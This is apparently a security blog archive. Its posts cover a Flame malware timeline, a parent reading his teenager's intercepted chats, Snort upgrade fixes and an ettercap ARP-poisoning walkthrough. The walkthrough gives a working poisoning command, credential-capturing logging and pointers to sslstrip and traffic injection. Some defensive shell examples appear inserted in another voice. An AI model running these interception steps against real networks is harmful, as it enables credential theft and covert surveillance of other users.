<li>Network sniffing, detecting network resources and collecting lists of vulnerable passwords </li>
<li>Scanning the disk of infected system looking for specific extensions and contents </li>
<li>Creating series of user’s screen captures when some specific processes or windows are active </li>
<li>Using the infected system’s attached microphone to record the environment sounds </li>
<li>Transferring saved data to control servers </li>
<li>Using more than 10 domains as C&C servers </li>
<li>Establishment of secure connection with C&C servers through SSH and HTTPS protocols </li>
<li>Bypassing tens of known antiviruses, anti-malware and other security software </li>
<li>Capable of infecting Windows XP, Vista and 7 operating systems </li>
<li>Infecting large scale local networks</li>
</ul>
</blockquote>
Both Kaspersky Lab and MAHER tie Flame to Stuxnet and Duqu. Kaspersky later referred to this MAHER post as having been published on May 27 rather than the date listed on the page, which is May 28.<br />
<br />
CrySyS Lab publishes the first version of its 64-page <a href="http://www.crysys.hu/skywiper/skywiper.pdf" target="_blank">sKyWIper (Flame) technical report</a>, updated to version 1.05 as of May 31. The report states that Flame may have been active for as long as five to eight years at the time of discovery. The report details modules, encryption, activation, propagation, component descriptions, C&C details, scripts, and evasion techniques.<br />
<br />
2012 June 01:<br />
<br />
OpenDNS provides a <a href="http://blog.opendns.com/2012/06/01/unique-insight-into-flame-malware/" target="_blank">timeline of command and control domain registrations</a>. Domains were registered and active as far back as 2008. <br />
<br />
The New York Times publishes an article, <a href="http://www.nytimes.com/2012/06/01/world/middleeast/obama-ordered-wave-of-cyberattacks-against-iran.html" target="_blank">Obama Ordered Wave of Cyberattacks Against Iran</a>, detailing efforts directed first by the Bush administration and increased by the Obama administration to use cyberattacks to slow Iranian nuclear development. The article ties the attacks most directly to Stuxnet and was adapted from David E. Sanger's new book, <i>Confront and Conceal: Obama's Secret Wars and Surprising Use of American Power</i>.<br />
<br />
2012 June 03:<br />
<br />
Microsoft issues <a href="http://technet.microsoft.com/en-us/security/advisory/2718704" target="_blank">Security Advisory (2718704): Unauthorized Digital Certificates Could Allow Spoofing</a> after revelations that Flame was using a cryptographic collision and terminal server licensing certificates to sign code, allowing spoofing of Windows Update. Microsoft issued an emergency patch that blacklisted the three intermediate certificate authorities.<br />
<br />
2012 June 04:<br />
<br />
ArsTechnica rounds up links, quotes, and information in <a href="http://arstechnica.com/security/2012/06/flame-malware-was-signed-by-rogue-microsoft-certificate/" target="_blank">"Flame" malware was signed by rogue Microsoft certificate</a>. I will not repeat their work, but instead say that they did a good job providing information along with links to more detailed posts and articles from the various players that have been active in the dissemination of information about Flame.<br />
<br />
Kaspersky Lab posts <a href="http://www.securelist.com/en/blog/208193540/The_Roof_Is_on_Fire_Tackling_Flames_C_C_Server" target="_blank">The Roof is on Fire: Tackling Flame's C&C Servers</a>. The post includes a chart comparing Duqu and Flame command and control infrastructure, from choice of OS (CentOS for Duqu, Ubuntu for Flame) to number of known C&C domains (80+ for Flame), and more. They go into great detail about the C&C architecture, including the domains being purchased primarily through GoDaddy, the fake identities used for registration, the technical details of the C&C infrastructure, and a list showing the geographic distribution of infections. OpenDNS's timeline links to this post by Kaspersky Lab, so it was presumably posted around the same day, June 01, then updated later.<br />
<br />
2012 June 05:<br />
<br />
Bitdefender Labs details how Flame uses USB and old-fashioned sneakernet to move data off systems that are not connected to the Internet and onto systems that have previously connected to Flame's C&C servers. <a href="http://labs.bitdefender.com/2012/06/flame-the-story-of-leaked-data-carried-by-human-vector/" target="_blank">FLAME – The Story of Leaked Data Carried by Human Vector</a> also mentions how Flame is different from much other malware, for instance very large file sizes and no anti-debugging or anti-reversing code.<br />
<br />
2012 June 06:<br />
<br />
Microsoft Security Research and Defense posts <a href="http://blogs.technet.com/b/srd/archive/2012/06/06/more-information-about-the-digital-certificates-used-to-sign-the-flame-malware.aspx?Redirected=true" target="_blank">Flame malware collision attack explained</a>. This goes into detail and is well worth reading. Notable is that Windows versions older than Vista would have been vulnerable even without the MD5 collision, but newer versions required the collision attack.<br />
<br />
ArsTechnica also posts on the subject and links to the same MS post among others in their <a href="http://arstechnica.com/security/2012/06/flames-god-mode-cheat-code-wielded-to-hijack-windows-7-server-2008/" target="_blank">Flame's "god mode cheat code" wielded to hijack Windows 7, Server 2008</a>. Included is a <a href="http://arstechnica.com/security/2008/12/theoretical-attacks-yield-practical-attacks-on-ssl-pki/" target="_blank">link to a write-up about a theoretical MD5 collision attack</a> dating back to 2007, which itself was an extension of work from 2004. In 2008, the attack went from theoretical to practical.<br />
<br />
Symantec's blog post titled <a href="http://www.symantec.com/connect/blogs/flamer-urgent-suicide" target="_blank">Flamer: Urgent Suicide</a> details remaining Flame C&C servers sending a command to essentially uninstall from infected systems by deleting then overwriting Flame files with random data.<br />
<br />
Related to the topic of cyber espionage but not dealing directly with Flame, <a href="http://www.washingtonpost.com/business/google-adds-warning-to-users-of-possible-state-sponsored-attacks/2012/06/06/gJQAFQePIV_print.html" target="_blank">Google announces that they will warn users of possible state-sponsored attacks</a>. <br />
<br />
2012 June 07:<br />
<br />
Details start to emerge that Flame used a new collision attack. ArsTechnica posts <a href="http://arstechnica.com/security/2012/06/flame-crypto-breakthrough/" target="_blank">Flame breakthrough shows Flame was designed by world-class scientists</a>. Marc Stevens and B.M.M de Weger are quoted as saying that the <a href="http://www.cwi.nl/news/2012/cwi-cryptanalist-discovers-new-cryptographic-attack-variant-in-flame-spy-malware" target="_blank">collision attack was new</a>.<br />
<blockquote class="tr_bq">
“Flame uses a completely new variant of a ‘chosen prefix collision
attack’ to impersonate a legitimate security update from Microsoft. The
design of this new variant required world-class cryptanalysis,” says
Marc Stevens. “It is very important to invest in cryptographic research,
to continue to be ahead of these developments in practice.”</blockquote>
This adds to the already substantial and still growing evidence regarding the type of resources needed to build Flame.<br />
<br />
2012 June 11:<br />
<br />
Bitdefender Labs gets into some great detail on components within Flame, including comparisons to Stuxnet, in <a href="http://labs.bitdefender.com/2012/06/stuxnets-oldest-component-solves-the-flamer-puzzle/" target="_blank">Stuxnet's Oldest Component Solves the Flamer Puzzle</a>.<br />
<blockquote class="tr_bq">
"As mentioned before, atmpsvcn.ocx was believed to belong to Stuxnet:
more to the point, its MD5 hash (b4429d77586798064b56b0099f0ccd49) was
detected in a Stuxnet dropper. This irrefutably places it as a Stuxnet
component. It is common knowledge that Stuxnet used quite an array of
droppers, and one of the oldest such droppers, dated from 2009, also
contains the atmpsvcn.ocx component. Inside the dropper, we identified a
resource encrypted using XOR 255 (0xFF) that is 520.192 bytes large and
has the same hash: b65f8e25fb1f24ad166c24b69fa600a8.<br />
<br />
This concludes the first part of the demonstration. There is no doubt
about it being a Stuxnet component, but today’s demonstration will shed
new light on how it fits in the Flamer puzzle."</blockquote><br />
<br />
A Practical Example of Non-technical Indicators and Incident Response, posted 2012-06-04<br />
<br />
Once upon a time there was a network security analyst slash NSM engineer
who, like any sane person, ran full packet capture, IDS/IPS, session capture,
and passive fingerprinting inline at the ingress/egress of his home network.
His setup was most similar to diagram two in <a href="http://eatingsecurity.blogspot.com/2008/01/idsips-placement-on-home-network.html">IDS/IPS
Placement on Home Network</a>.
<br />
<br />
This security analyst was casually going about his business
one day when he opened the basement door of his house and found a tennis ball
wedged between the door frame and the storm door. “That’s odd!” he thought.
“Who would do that?”
<br />
<br />
After removing the tennis ball, he thought, “Well, this
storm door is really loud when it closes those last few inches. Maybe someone
did it to quietly enter or exit the house.” It just so happens that the
daughter of said analyst was in high school and her bedroom was down the hall from the basement door. He promptly entered her room and took a quick look around. Lo and behold, the
screen from her window was under her bed and the window itself was unlocked.
Since this room was on the ground floor, the analyst immediately had some good
ideas about what was happening with the window and the basement door. Someone
was sneaking in or out of the house!
<br />
<br />
The analyst confronted his teenage daughter when she got
home from school and received denial after denial about any possible
wrongdoing. The denials did not sound sincere.
<br />
<br />
Enter the network security monitoring. He stated, “I told you I would
respect your privacy with your email and other electronic communications unless
you gave me a reason not to. I consider you in violation of these Terms of
Service and I’m going to see what you’ve been up to lately.”
<br />
<br />
At this point it was late in the evening and the analyst had
to get up early for work. This was some years back when AIM was quite common,
so he briefly used Sguil to look at recent sessions of AOL Instant Messenger
traffic. He decided to get some sleep for work the next day and put off additional
investigation. In the meantime, his daughter's privileges were highly restricted.
<br />
<br />
A day or two later, after trying to manually sift through
some of the ASCII transcripts of the packet captures the analyst quickly
decided there was a better way. He whipped up <a href="http://eatingsecurity.blogspot.com/2007/11/for-loop-with-tcpdump.html" target="_blank">a short shell script to loop through all the packet captures</a>, run Dug Song’s msgsnarf, and pipe the output into an HTML file for later examination. This required a little tweaking to make the HTML easily readable, but it was fairly quick to write and test the script.<br />
The next morning there were many hundreds of lines of AIM conversations
to examine. He started working from the most recent and reading backwards.
After a few minutes he quickly confirmed that his daughter had been sneaking
out of the house to go to parties and get into other mischief.
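<br />
<br />
A version of that loop as an added example (my own code, not the script the post links to): it walks a directory of capture files, runs an extractor such as msgsnarf on each, and writes one HTML page. The directory, file pattern and extractor command are parameters and are assumptions here. The one thing this version does that a quick one-off usually skips is HTML-escaping the extracted text: chat content pulled off the wire is untrusted input, and without escaping a message containing markup would be rendered, or run, in the analyst's browser when the page is opened.

```shell
#!/bin/sh
# Added example, not the post's own script: loop over capture files, run an
# extractor on each, and wrap the combined output in a single HTML page.
# The extractor is a parameter; the post used msgsnarf (dsniff) on pcaps, but any
# command that takes a capture path and writes text to stdout will work.
# Everything in the captures is attacker-controlled input, so it is escaped
# before it is placed inside the page.

# html_escape: escape &, <, > and " so extracted text is inert inside HTML.
# Ampersand must be handled first or the other entities would be re-escaped.
html_escape() {
    sed -e 's/&/\&amp;/g' -e 's/</\&lt;/g' -e 's/>/\&gt;/g' -e 's/"/\&quot;/g'
}

# captures_to_html DIR GLOB EXTRACTOR OUTFILE
#   DIR       directory holding the capture files (assumed layout)
#   GLOB      filename pattern to match, e.g. 'snort.log.*' or '*.pcap'
#   EXTRACTOR command run as "$EXTRACTOR <file>", e.g. 'msgsnarf -p'
#   OUTFILE   HTML file to write
captures_to_html() {
    dir="$1"; glob="$2"; extractor="$3"; out="$4"
    {
        printf '<!DOCTYPE html>\n<html><head><meta charset="utf-8"><title>Extracted messages</title></head>\n<body>\n'
        # Shell globbing returns names sorted, so the page reads oldest first
        # when captures carry a timestamp in the name (as snort.log.<epoch> does).
        for f in "$dir"/$glob; do
            [ -f "$f" ] || continue
            printf '<h2>%s</h2>\n<pre>\n' "$(printf '%s' "$f" | html_escape)"
            # Word-splitting of $extractor is intentional: it may carry options.
            $extractor "$f" 2>/dev/null | html_escape
            printf '</pre>\n'
        done
        printf '</body></html>\n'
    } > "$out"
}

# count_lines_matching FILE PATTERN: number of lines in FILE containing the
# fixed string PATTERN; handy for a quick sanity check of the generated page.
count_lines_matching() {
    grep -F -c -- "$2" "$1"
}
```

With dsniff installed and captures under an assumed /nsm/dailylogs, the call would be `captures_to_html /nsm/dailylogs 'snort.log.*' 'msgsnarf -p' aim.html`; msgsnarf's `-p` reads from a pcap file instead of an interface.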
<br />
<br />
Another conversation with his daughter finally led to her
confession, a long discussion, and suitable punishment. Despite the severity of
her actions, the HTML file containing the chat transcripts also contained a few endearing nuggets.
<br />
<br />
Daughter: OMG they know everything!<br />
Accomplice: what do u mean everything<br />
Daughter: my dad can read all my chats<br />
Daughter: he does computer security for [company redacted]<br />
Daughter: he’s a computer genius<br />
Daughter: DAD I’M INNOCENT!<br />
<br />
Upon telling this story to a current colleague, he mentioned
that the last few lines are the best father’s day gift the analyst would ever receive.
<br />
<br />
I think there are a few obvious lessons here that can translate
to network monitoring.
<br />
<br />
First, the initial indicator of the problem was in the
physical world. Network security monitoring, like any other type of technical
monitoring and prevention, will sometimes fail to catch a problem. I have experienced many times when phone
calls from users have been one of the earliest indicators of malicious
activity. Particularly in the case of insider threats, it's important to note that many initial indicators of malicious activity are non-technical: a person's behavior, a personnel action, or, as in this case, a physical sign of a security problem.
<br />
<br />
Second, sometimes you need to be flexible to solve a problem
quickly and with minimal effort. The analyst could have manually looked at the AIM
traffic, but because he judged that the threat of another incident was already
mitigated by talking to the daughter, digging up the traffic wasn’t urgent. Instead, the analyst decided to write a script that would pull all the traffic and convert it to a readable format. The analyst also had the luxury of knowing that all the packet captures would still be there, since at his home bandwidth the sensor retained well over 30 days of pcap.
<br />
<br />
Third, network monitoring is a means to an end. In this
case, there was a security problem that could be addressed with the help of
technical means. In many obvious cases you are trying to protect data. In other
cases, you can be trying to protect people or things in the physical world that
could be harmed if the wrong information is revealed. It is important to stay
focused on what really matters and not get caught worrying about the wrong
things because your instrumentation or technologies push you towards priorities
that don’t make sense.<br />
<br />
Last, attackers are not static. The daughter definitely learned the value of encryption and even using out-of-band communication in the form of SMS over the phone network if she did not want the network sensor recording her conversations in plain text. Technology advancement also makes attackers evolve, for instance with the move to Facebook chat or SMS from older forms of IM.<br />
<br />
Updating to Snort 2.9.2 and Barnyard2, posted 2012-03-26<br />
<br />
After fixing hardware problems that had my home network sensor out of commission for the better part of a year, I recently got the system inline again. Because the sensor had been down for so long, I was running a fairly old version of Snort, 2.9.0.3, along with barnyard 0.2.0. I decided the first thing I should do after updating the OS itself was update Snort and Barnyard.<br />
<br />
I won't go through the process in detail since there are many resources online for installing and configuring Snort. The main thing I will point out is that you should always look in the <span style="font-family: "Courier New",Courier,monospace;">docs/</span> directory for information on installing and upgrading. If you're updating from a previous version, pay particular attention to changes and new features. Another important thing to do is look closely at the <span style="font-family: "Courier New",Courier,monospace;">snort.conf</span> provided with a given version in <span style="font-family: "Courier New",Courier,monospace;">&lt;src dir&gt;/etc/</span> since it will have a lot of information on defaults and configuration directives that may be required. These won't always be the same as in previous versions. It's also important to update to the latest rule sets, check for new rules files, and do all the other normal tuning to make sure certain rules are turned off or on.<br />
<br />
I had two main problems when I updated, one with Snort and one with Barnyard2. Since Snort is the main piece of the puzzle here, I updated it prior to Barnyard. After updating to Snort-2.9.2.1 and fixing the configuration, I was able to run Snort successfully using the options I normally had previously. However, as soon as I put the sensor back inline and Snort started processing packets, Snort would exit with an error.<br />
<br />
<tt>Can't acquire (-1) - ipq_daq_acquire: ipq_read=-1 error Failed to receive netlink message!</tt><br />
<br />
A quick search revealed that I had to remove the ip_queue module. <a href="http://global-security.blogspot.com/" target="_blank">JJ Cummings</a> on the #snort channel pointed out to me that NFQ is the newer option and has replaced IPQ. I am using Slackware-current; even though it is a maintained distribution, it is not surprising that I was still using the older option. Slackware also did not have a couple of the libraries required to compile DAQ with support for NFQ, so I went to Slackbuilds.org to get the files allowing me to create Slackware packages for <a href="http://slackbuilds.org/repository/13.37/libraries/libnetfilter_queue/" target="_blank">libnetfilter_queue</a> and <a href="http://slackbuilds.org/repository/13.37/libraries/libnfnetlink/" target="_blank">libnfnetlink</a>.<br />
<br />
Once I got the new packages installed, made sure the ip_queue module wasn't loaded, recompiled DAQ to support NFQ, and changed my Snort init to use <span style="font-family: "Courier New",Courier,monospace;">--daq nfq</span>, my inline Snort was working once again.<br />
<br />
Next, I updated from Barnyard-0.2.0.<br />
<br />
<tt>$ barnyard2 -V<br /><br /> ______ -*&gt; Barnyard2 &lt;*-<br /> / ,,_ \ Version 2.1.10-beta2 (Build 266) TCL<br /> |o" )~| By Ian Firns (SecurixLive): http://www.securixlive.com/<br /> + '''' + (C) Copyright 2008-2011 Ian Firns &lt;firnsy@securixlive.com&gt;<br /></tt><br />
<br />
Barnyard2 is needed to process Snort's newer output mode, unified2. My snort.conf changed from:<br />
<br />
<tt>output log_unified: filename unified.log, limit 128</tt><br />
<br />
to:<br />
<br />
<tt>output unified2: filename unified.log, limit 128</tt><br />
<br />
When I got Barnyard2 up and running, it was obviously not successfully processing the unified2 files from Snort. Barnyard2 kept repeating the following error as it tried to process the files.<br />
<br />
<tt>WARNING: No function defined to read header.</tt><br />
<br />
I found a thread on the <a href="http://seclists.org/snort/2010/q1/818" target="_blank">snort-users list</a> that indicated Barnyard2 was getting a file type it wasn't expecting, which made sense considering the warning message. This issue gave me more problems than it should have and I eventually realized it was because of an error in my barnyard.conf file. The input is supposed to read "<span style="font-family: "Courier New",Courier,monospace;">input unified2</span>" but I had somehow managed to include a colon after "input". Once I fixed that line, Barnyard2 started working, with alerts being properly processed and showing up in Sguil once again.<br />
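<br />
As an added example (my own, not from the post or the Snort project), here is a small pre-flight check that catches the two configuration mistakes above, the legacy unified output mode in snort.conf and the stray colon in barnyard2.conf, plus a still-loaded ip_queue module, before the services are restarted. The file paths in the usage comment and the exact grep patterns are assumptions based on the directives quoted above.

```shell
#!/bin/sh
# Added example, not part of the post: pre-flight checks for the Snort and
# Barnyard2 configuration problems described above.
#   1. snort.conf must emit unified2, not the old unified format Barnyard2 cannot read.
#   2. barnyard2.conf must use "input unified2" (no colon after "input").
#   3. The obsolete ip_queue module must not be loaded when using "--daq nfq".
# Assumed usage: check_sensor_config /etc/snort/snort.conf /etc/snort/barnyard2.conf

# active_lines FILE: strip comments and blank lines so only live directives remain.
active_lines() {
    sed -e 's/#.*$//' -e '/^[[:space:]]*$/d' "$1"
}

# check_snort_output CONF: 0 if an active "output unified2:" line exists and no
# legacy "output log_unified:" / "output alert_unified:" line is still active.
check_snort_output() {
    active_lines "$1" | grep -Eq '^[[:space:]]*output[[:space:]]+unified2:' || return 1
    active_lines "$1" | grep -Eq '^[[:space:]]*output[[:space:]]+(log|alert)_unified:' && return 1
    return 0
}

# check_barnyard_input CONF: 0 if "input unified2" is present; 1 for the colon
# typo ("input: unified2") or a missing input line.
check_barnyard_input() {
    active_lines "$1" | grep -Eq '^[[:space:]]*input:' && return 1
    active_lines "$1" | grep -Eq '^[[:space:]]*input[[:space:]]+unified2[[:space:]]*$' || return 1
    return 0
}

# check_ip_queue_unloaded: 0 if ip_queue is not loaded (or lsmod is unavailable).
check_ip_queue_unloaded() {
    command -v lsmod >/dev/null 2>&1 || return 0
    lsmod | awk '{print $1}' | grep -qx ip_queue && return 1
    return 0
}

# check_sensor_config SNORT_CONF BARNYARD_CONF: run all checks, print one line
# per problem, and return non-zero if anything needs fixing.
check_sensor_config() {
    rc=0
    check_snort_output "$1"   || { echo "snort.conf: need 'output unified2:' (and drop log_unified/alert_unified)"; rc=1; }
    check_barnyard_input "$2" || { echo "barnyard2.conf: need 'input unified2' with no colon after 'input'"; rc=1; }
    check_ip_queue_unloaded   || { echo "kernel: ip_queue is loaded; unload it before using --daq nfq"; rc=1; }
    return $rc
}
```

Dropping the check into the sensor's init script ahead of the Snort and Barnyard2 start lines turns the "No function defined to read header" surprise into a clear message before anything is started.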
<br />
The next update will be to go from Sguil-0.7.0 to Sguil-0.8.0.<br />
<br />
Flocon 2012, posted 2012-01-04<br />
<br />
<a href="http://www.cert.org/flocon/" target="_blank">Flocon 2012</a> is January 9-12, which is next week. It's fairly late, but I believe registration is still open. The <a href="http://www.cert.org/flocon/schedule/all.html" target="_blank">schedule</a> includes speakers from many organizations and looks quite interesting. I will be attending and am looking forward to it. <br />
<br />
Happy New Year!<br />
<br />
Recent Advances in Intrusion Detection 2011, posted 2011-09-14<br />
For anyone still following despite my infrequent posting, I will be going to the <a href="http://www.raid2011.org/">International Symposium on Recent Advances in Intrusion Detection</a> next week. I haven't made time to attend a conference in quite a while, so I'm looking forward to it.<br />
<br />
If anyone that knows me is attending and interested in getting together, let me know. If you know me either online or in meatspace, hopefully that means you know how to reach me.<br />
<br />
This post doubled my number of blog posts to date for 2011. The most likely next post will be covering anything interesting from the conference. Beyond that, I don't anticipate much posting activity in the near future for a number of reasons.<br />
<br />
Using ettercap for ARP poisoning, posted 2011-02-28<br />
<br />
<a href="http://ettercap.sourceforge.net/">Ettercap</a> is certainly nothing new, and there is plenty of documentation around to see how to use it, but I was sitting here goofing around and decided to record my results. I am not advocating this type of thing on a public network, and ARP poisoning or other attacks often fall afoul of terms of service for public and private networks, and may even be illegal in some jurisdictions.<br />
<br />
First, I looked at my default route.<br />
<br />
<span style="font-family: "Courier New",Courier,monospace;">$ route -n<br />
Kernel IP routing table<br />
Destination Gateway Genmask Flags Metric Ref Use Iface<br />
10.71.0.0 0.0.0.0 255.255.255.0 U 2 0 0 wlan0<br />
0.0.0.0 10.71.0.1 0.0.0.0 UG 0 0 0 wlan0</span><br />
<br />
<span style="font-family: inherit;">To sniff the whole subnet, I'll want to do some ARP poisoning to send all traffic to/from the default route through my system.</span><br />
<br />
<span style="font-family: "Courier New",Courier,monospace;">$ sudo ettercap -i wlan0 -T -M arp:remote /10.71.0.1/ //</span><br />
<br />
You can also use "// //" to designate ARP poisoning no matter what source and destination ettercap sees. The "-T" tells ettercap to use the text interface, which is still interactive. There is also a curses-based interface, "-C", and GTK with "-G" though it has always seemed less reliable to me than the others. The curses interface is actually pretty nice.<br />
<br />
Once you run the command, ettercap should enumerate hosts and you will start seeing a bunch of traffic information scrolling through your console. How do we know if it's actually working? If you see non-broadcast traffic destined for other hosts, it will be obvious and you will know you're successfully sniffing all the traffic.<br />
<br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjjUdtO5yAc6j4SLWDeKEnxaMFavi69YMO7tObr2zUawwQbbPFAcpcOE1NMgqGQp76XigrjAEUfPKIoT-j7f8Lk3G-WnGy_bwaybOfeFIQMuFDje8EVb9QTG3KNmhcm4JrQHa9xjZiAZ6GJ/s1600/etherape-ettercap-scaled.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="193" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjjUdtO5yAc6j4SLWDeKEnxaMFavi69YMO7tObr2zUawwQbbPFAcpcOE1NMgqGQp76XigrjAEUfPKIoT-j7f8Lk3G-WnGy_bwaybOfeFIQMuFDje8EVb9QTG3KNmhcm4JrQHa9xjZiAZ6GJ/s320/etherape-ettercap-scaled.png" width="320" /></a>Another fun way is by opening etherape to see a realtime visualization of the traffic. If you are seeing typical non-broadcast traffic like HTTP, HTTPS, that's an indicator that you're successfully ARP poisoning. You can also get a quick idea if there are particular hosts getting a lot of traffic activity. I've seen the typical sites like Facebook, Amazon, Akamai, and LLNW, but also more interesting sites that are easily identifiable as VPN concentrators, banks, and more.<br />
<br />
You can also, of course, use various tools, including ettercap with the "-w" option, to write traffic to a file and review it at your leisure to look for interesting data. Ettercap also has a logging option that automatically records the usernames and passwords it sees. From the man page:<br />
<br />
<span style="font-family: "Courier New",Courier,monospace;"> -L, --log &lt;logfile&gt;<br />
Log all the packets to binary files. These files can be parsed<br />
by etterlog(8) to extract human readable data. With this option,<br />
all packets sniffed by ettercap will be logged, together with<br />
all the passive info (host info + user & pass) it can collect.<br />
Given a LOGFILE, ettercap will create LOGFILE.ecp (for packets)<br />
and LOGFILE.eci (for the infos).</span><br />
<br />
If you didn't run this with ettercap originally, you can also run it on a saved packet capture.<br />
<br />
<div style="font-family: "Courier New",Courier,monospace;">$ ettercap -r hotel.raw -L hotel<br />
<br />
ettercap NG-0.7.3 copyright 2001-2004 ALoR & NaGA<br />
<br />
Please select an User Interface<br />
<br />
$ ls hotel*</div><div style="font-family: "Courier New",Courier,monospace;">hotel.eci hotel.ecp hotel.raw<br />
<br />
$ etterlog -a hotel.eci </div><div style="font-family: "Courier New",Courier,monospace;"><br />
etterlog NG-0.7.3 copyright 2001-2004 ALoR & NaGA<br />
<br />
Log file version : NG-0.7.3<br />
Timestamp : Wed Feb 16 14:20:57 2010<br />
Type : LOG_INFO<br />
<br />
Number of hosts (total) : 248<br />
<br />
Number of local hosts : 30<br />
Number of non local hosts : 0<br />
Number of gateway : 0<br />
<br />
Number of discovered services : 240<br />
Number of accounts captured : 4</div><br />
<div style="font-family: "Courier New",Courier,monospace;">$ etterlog -p hotel.eci<br />
<br />
74.125.93.191 TCP 80 USER: fakeuser PASS: fakepasswd</div><br />
I changed the data above and of course most sites these days are hopefully forcing encrypted logins.<br />
<br />
These days, many sites can be hosted on one IP or virtual server. If you're not catching the DNS or HTTP request specifically before the login that was captured, the easiest way to determine which site on a specific IP was being visited would be opening up the packet capture with a tool like Wireshark, using a filter for the IP, then looking at the actual web traffic for the site's name. Looking in Wireshark, I can see the GET immediately after the TCP handshake.<br />
<br />
<span style="font-family: "Courier New",Courier,monospace;">GET /members/bbs/showthread.php HTTP/1.1</span><br />
<span style="font-family: "Courier New",Courier,monospace;">Host: www.fakedomain.com</span><br />
<br />
<span style="font-family: inherit;">This really just scratches the surface of what you can do with ettercap and other network tools. ARP poisoning still works, particularly on public networks, and many people log in to many services that can be easily compromised through sniffing (I write while sitting in an airport on public WiFi logged into my blogger account).</span> A relatively recent high profile example was when the Metasploit site was <a href="http://www.zdnet.com/blog/security/metasploit-projects-site-hijacked-through-arp-poisoning/1242">briefly hijacked</a> by successful ARP poisoning.<br />
<br />
There are numerous other attacks besides sniffing that could succeed when ARP poisoning, many involving redirecting traffic or injecting malicious content. For instance, you can use something like <a href="http://www.thoughtcrime.org/software/sslstrip/">sslstrip</a> to redirect all HTTPS traffic to HTTP, grabbing credentials in the process. You could also inject content directly using etterfilter.<br />
<br />
<div style="font-family: "Courier New",Courier,monospace;"> DESCRIPTION<br />
The etterfilter utility is used to compile source filter files into<br />
binary filter files that can be interpreted by the JIT interpreter in<br />
the ettercap(8) filter engine. You have to compile your filter scripts<br />
in order to use them in ettercap. All syntax/parse errors will be<br />
checked at compile time, so you will be sure to produce a correct<br />
binary filter for ettercap.</div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjqIo1wtkFfPQyKbv8edSqZC1mrhbr-i0zAphObJUhaFaZi8w4Bfi97UwSiusQR1wj1dHiyad7Naozw4hzEAF7ye_F4w3-tNcweyUYWXigOT0ncsnpz5QROZoiwOj_U5Ix85i2HlyapnCYZ/s1600/pwned.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjqIo1wtkFfPQyKbv8edSqZC1mrhbr-i0zAphObJUhaFaZi8w4Bfi97UwSiusQR1wj1dHiyad7Naozw4hzEAF7ye_F4w3-tNcweyUYWXigOT0ncsnpz5QROZoiwOj_U5Ix85i2HlyapnCYZ/s1600/pwned.jpg" /></a></div>Using etterfilter you can inject new packets, replace data in packets, and more. If someone is visiting what they consider a known safe site, replacing data or injecting malicious packets can be quite successful. At a previous job, we had a non-production network for attack and defend fun, and with etterfilter I was able to <a href="http://www.irongeek.com/i.php?page=security/ettercapfilter">replace all image requests</a> made by one of my colleagues' browsers and instead have it request the image to the left.<br />
<br />
Although my example above is obviously on a wireless network, as shown by the wlan0 interface, you can just as easily perform ARP poisoning on a local wired segment. There are also a number of ways to help detect or prevent poisoning with your network appliances or software.<br />
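One of those detection approaches, as an added example that is not part of the original post: an arpwatch-style check over tcpdump ARP output (the tcpdump -n -e line format is assumed and the sample replies are constructed) that flags an IP whose advertised MAC changes, the same flip-flop that ettercap's own arp_cop plugin reports.

```shell
#!/bin/sh
# Added example, not from the original post: a small arpwatch-style check
# that reads "tcpdump -n -e arp" lines and flags two poisoning symptoms:
#   1. an IP whose advertised MAC changes between replies (flip-flop)
#   2. a reply whose Ethernet source MAC differs from the MAC it advertises
# The tcpdump line format is assumed to look like:
#   12:00:00.000001 aa:aa:aa:aa:aa:01 > ff:ff:ff:ff:ff:ff, ethertype ARP (0x0806), length 60: Reply 192.168.1.1 is-at aa:aa:aa:aa:aa:01, length 46

# Reads tcpdump lines on stdin, prints one ALERT line per finding.
# Returns 1 if anything was flagged, 0 otherwise.
arp_flip_check() {
    awk '
    /: Reply / && / is-at / {
        src = $2                        # Ethernet source MAC of the frame
        for (i = 1; i <= NF; i++) {
            if ($i == "Reply") ip = $(i + 1)
            if ($i == "is-at") { mac = $(i + 1); sub(/,$/, "", mac) }
        }
        if (src != mac) {
            printf "ALERT %s advertised by %s but frame sent from %s\n", ip, mac, src
            alerts++
        }
        if ((ip in seen) && seen[ip] != mac) {
            printf "ALERT %s changed %s -> %s\n", ip, seen[ip], mac
            alerts++
        }
        seen[ip] = mac
    }
    END { exit (alerts > 0) }
    '
}

# Constructed sample: the real gateway answers twice, then a second host
# starts answering for the gateway address with its own MAC.
ARP_SAMPLE='12:00:00.000001 aa:aa:aa:aa:aa:01 > ff:ff:ff:ff:ff:ff, ethertype ARP (0x0806), length 60: Reply 192.168.1.1 is-at aa:aa:aa:aa:aa:01, length 46
12:00:00.000002 aa:aa:aa:aa:aa:01 > cc:cc:cc:cc:cc:03, ethertype ARP (0x0806), length 42: Reply 192.168.1.1 is-at aa:aa:aa:aa:aa:01, length 28
12:00:05.000003 bb:bb:bb:bb:bb:02 > cc:cc:cc:cc:cc:03, ethertype ARP (0x0806), length 42: Reply 192.168.1.1 is-at bb:bb:bb:bb:bb:02, length 28'

# Live use would be:  tcpdump -l -n -e -i wlan0 arp | arp_flip_check
printf '%s\n' "$ARP_SAMPLE" | arp_flip_check || echo "poisoning indicators found"
```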
<br />
Finally, ettercap also has a number of interesting plugins available.<br />
<span style="font-family: "Courier New",Courier,monospace;">$ ettercap -P list<br />
<br />
ettercap NG-0.7.3 copyright 2001-2004 ALoR & NaGA<br />
<br />
<br />
Available plugins :<br />
<br />
arp_cop 1.1 Report suspicious ARP activity<br />
autoadd 1.2 Automatically add new victims in the target range<br />
chk_poison 1.1 Check if the poisoning had success<br />
dns_spoof 1.1 Sends spoofed dns replies<br />
dos_attack 1.0 Run a d.o.s. attack against an IP address<br />
dummy 3.0 A plugin template (for developers)<br />
find_conn 1.0 Search connections on a switched LAN<br />
find_ettercap 2.0 Try to find ettercap activity<br />
find_ip 1.0 Search an unused IP address in the subnet<br />
finger 1.6 Fingerprint a remote host<br />
finger_submit 1.0 Submit a fingerprint to ettercap's website<br />
gre_relay 1.0 Tunnel broker for redirected GRE tunnels<br />
gw_discover 1.0 Try to find the LAN gateway<br />
